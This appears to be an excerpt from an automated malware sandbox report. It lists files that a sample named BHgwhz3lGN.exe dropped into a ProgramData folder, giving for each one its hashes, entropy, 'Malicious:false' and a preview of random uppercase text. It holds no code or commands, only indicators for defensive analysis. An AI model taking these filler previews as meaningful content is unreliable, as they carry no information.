                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\8qqi5x

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\90zct2

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\9r9r16

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\a1vsri

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\as00r1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\asjwlx

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\b1dbai

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.690067217069288
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                                                                                                                                                                                                                          MD5:4E32787C3D6F915D3CB360878174E142
                                                                                                                                                                                                                                                                                          SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                                                                                                                                                                                                                          SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                                                                                                                                                                                                                          SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\bas0zu

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\c2no8y

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                          Malicious:false
